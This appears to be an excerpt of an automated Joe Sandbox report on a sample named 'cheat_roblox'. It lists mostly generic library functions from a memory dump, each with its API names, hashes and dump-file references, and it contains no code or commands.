                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocString
                                                                              • String ID:
                                                                              • API String ID: 262959230-0
                                                                              • Opcode ID: 78f40180803c07e16f725ce8caa782a98fbfbfcb68ebd86bc368cce44f009025
                                                                              • Instruction ID: 1d28a165f95a959bede946786a17422a29ca807a13eff269d1983a76057e9eb6
                                                                              • Opcode Fuzzy Hash: 78f40180803c07e16f725ce8caa782a98fbfbfcb68ebd86bc368cce44f009025
                                                                              • Instruction Fuzzy Hash: 7E41C231E097468AEB349F7194423B92299FF04BA8F144676EA6DE77E6DF3CE5418300
                                                                              Function 00007FF693E8F414 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID:
                                                                              • API String ID: 190572456-0
                                                                              • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                              • Instruction ID: 82ba4d21e014035a5ef12628a0378325f6f93a17ffc9484a6b875ebc611c8f15
                                                                              • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                              • Instruction Fuzzy Hash: 6241A162F0AA4281FE259F12B802675629AFF14BA0F094577DD1DEB754EE3CE8428300
                                                                              Function 00007FF693E956D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _set_statfp
                                                                              • String ID:
                                                                              • API String ID: 1156100317-0
                                                                              • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                              • Instruction ID: 71746eb158cafe684d2805f915f60eb14a8137a28f4824cd0c3c156ba974ed30
                                                                              • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                              • Instruction Fuzzy Hash: E4110676E1CB0785F6740D24ED43379014AEF443B0F4846B7EA7EEA6DACE6CA5404305
                                                                              Function 00007FF693E7FE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                              • String ID:
                                                                              • API String ID: 3621893840-0
                                                                              • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                              • Instruction ID: 0988dbb3ca014dae826134f52f35d1f58b91a944da11c5035188dc6f4870987b
                                                                              • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                              • Instruction Fuzzy Hash: 41F04932F3854682F7608B21F896A3A6229FFE4B05F941072EA4FD59A5DE2CD549CB00
                                                                              Function 00007FF693E8625C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: __except_validate_context_recordabort
                                                                              • String ID: csm$csm
                                                                              • API String ID: 746414643-3733052814
                                                                              • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                              • Instruction ID: fe121e0fd48da560c75388030289b848df17fac18bf9d0b21efe3ce73737b9e3
                                                                              • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                              • Instruction Fuzzy Hash: 1C71BF72A086818ADB708F25D05177DBBA4FB45B89F1481B7EB4CA7A89CF3CE491C740
                                                                              Function 00007FF693E880F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo
                                                                              • String ID: $*
                                                                              • API String ID: 3215553584-3982473090
                                                                              • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                              • Instruction ID: e6ff71c53c45753a6dcfe373ae27fe84a0af52671c3ae5e43448ece44e4a7865
                                                                              • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                              • Instruction Fuzzy Hash: 30514272D4CA4A8AE7758E28C45637C3BA9FB05B19F1411B7CE4AA1299CF3CEC81D705
                                                                              Function 00007FF693E91758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$StringType
                                                                              • String ID: $%s
                                                                              • API String ID: 3586891840-3791308623
                                                                              • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                              • Instruction ID: 42faded14efa7991dbd81089f5278c09a9b1af993b57e5fa81261ada125acb4d
                                                                              • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                              • Instruction Fuzzy Hash: E4419222B14B858AEB718F25D8023E96399FB44BE8F4846B6DE1DA77D5DF3CE4418300
                                                                              Function 00007FF693E866A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                              • String ID: csm
                                                                              • API String ID: 2466640111-1018135373
                                                                              • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                              • Instruction ID: f807f6615d8c8cfea4cc4aa458c97adbfdd8812c1787a09dc2ecaa373f5a69f7
                                                                              • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                              • Instruction Fuzzy Hash: E0515E72A5874287D630EF16E04226E77B8FB89BA0F140576EB8D97B95CF38E451CB00
                                                                              Function 00007FF693E94360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                              • String ID: U
                                                                              • API String ID: 2456169464-4171548499
                                                                              • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                              • Instruction ID: 7e5b9346496f5f14cd0cf6499d479bb3a504050c950281a89e5b4f9cfeeaded2
                                                                              • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                              • Instruction Fuzzy Hash: 6D41B422A19A85C2E720CF25E8463BA77A4FB88794F444132EE4DD7754DF7CD441CB00
                                                                              Function 00007FF693E790B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectRelease
                                                                              • String ID:
                                                                              • API String ID: 1429681911-3916222277
                                                                              • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                              • Instruction ID: 2fbba62142a6448ab3249d2b86af37166c4354b2cea28d615158c72f73efae7b
                                                                              • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                              • Instruction Fuzzy Hash: D4313A3560874286EA649F13B81972AB7B4F789FD1F504476ED4B97B54CE3CE449CB00
                                                                              Function 00007FF693E6E870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InitializeCriticalSection.KERNEL32(?,?,?,00007FF693E7317F,?,?,00001000,00007FF693E5E51D), ref: 00007FF693E6E8BB
                                                                              • CreateSemaphoreW.KERNEL32(?,?,?,00007FF693E7317F,?,?,00001000,00007FF693E5E51D), ref: 00007FF693E6E8CB
                                                                              • CreateEventW.KERNEL32(?,?,?,00007FF693E7317F,?,?,00001000,00007FF693E5E51D), ref: 00007FF693E6E8E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                              • String ID: Thread pool initialization failed.
                                                                              • API String ID: 3340455307-2182114853
                                                                              • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                              • Instruction ID: 189f503b84bb75d56d177b171965daf62888de315a7b84b1de65e7e846343b1e
                                                                              • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                              • Instruction Fuzzy Hash: 5421E772E1560286FB208F25E4463BD33E6EFC4B0CF188076CA0D8A295DF7E9845C784
                                                                              Function 00007FF693E785E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDeviceRelease
                                                                              • String ID:
                                                                              • API String ID: 127614599-3916222277
                                                                              • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                              • Instruction ID: 14e4afbb99ece0cc0a853b7eb05b7a805991d62abf8b2f4ff972b4ad12dbce2f
                                                                              • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                              • Instruction Fuzzy Hash: 56E08C20B0874282EBA857B6B58A13A2261EB8CBD0F158036EA5B8B794CE3CC4854300
                                                                              Function 00007FF693E5D1A8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                              • String ID:
                                                                              • API String ID: 1137671866-0
                                                                              • Opcode ID: 66336dcb59d317cbe96effd5cb9fab0caf6a303c2f8d10e1aae8010e8ff592b4
                                                                              • Instruction ID: b1d0fc3ec19279dc26c46acc29f8165f91a806c6f1513178c21bf2203fcfcc31
                                                                              • Opcode Fuzzy Hash: 66336dcb59d317cbe96effd5cb9fab0caf6a303c2f8d10e1aae8010e8ff592b4
                                                                              • Instruction Fuzzy Hash: E0A1C362E28B8681EE20DB65D4422BE6369FF85784F405173EA4CE7AE9DF3CE544C300
                                                                              Function 00007FF693E70548 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1452528299-0
                                                                              • Opcode ID: 3578434af854304fb897eec4f9fa00df497f7e1084ee6400d5c28e9fbb9a79f6
                                                                              • Instruction ID: 994149dc4eb3db5b2c9aa5698040d8c0d9cf733e43a67911ec658511b717f297
                                                                              • Opcode Fuzzy Hash: 3578434af854304fb897eec4f9fa00df497f7e1084ee6400d5c28e9fbb9a79f6
                                                                              • Instruction Fuzzy Hash: 2051AF72F14A4689FF209F65D4462FC2369EB84BD8F404173DA1DA7B9AEE28D945C340
                                                                              Function 00007FF693E79D90 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                              • String ID:
                                                                              • API String ID: 1077098981-0
                                                                              • Opcode ID: c706cd24276746ab5e2fa6f684baf4bd7a284fdc318c0cb51509761d2b1b6963
                                                                              • Instruction ID: 138781139fc845ccfb86303673e84bb7d6fe66cc512ca254dd865aeea07b7e06
                                                                              • Opcode Fuzzy Hash: c706cd24276746ab5e2fa6f684baf4bd7a284fdc318c0cb51509761d2b1b6963
                                                                              • Instruction Fuzzy Hash: F8518032A18B4286EB608F21E4467BE77B9FB84B84F501076EA4EA7B54DF3CD405CB40
                                                                              Function 00007FF693E8DB5C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                              • String ID:
                                                                              • API String ID: 4141327611-0
                                                                              • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                              • Instruction ID: 2e8ff3eec7bc862e11a2c21423c1c6dd80f3c33462bba74e7fc10471608517ea
                                                                              • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                              • Instruction Fuzzy Hash: D1419232E0C68247FB759F1591423BAA298EF80B90F1481B2DA5DA7AD5DF7CD8418700
                                                                              Function 00007FF693E63980 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3823481717-0
                                                                              • Opcode ID: 3bc213a9f55eb78a1b8575f48284007dba253a064d69617307a7282262df2cc1
                                                                              • Instruction ID: a00926ca2f13cce7a4f595ee0bf24b3203e29b2d70085cd413d9fb61ae7791fb
                                                                              • Opcode Fuzzy Hash: 3bc213a9f55eb78a1b8575f48284007dba253a064d69617307a7282262df2cc1
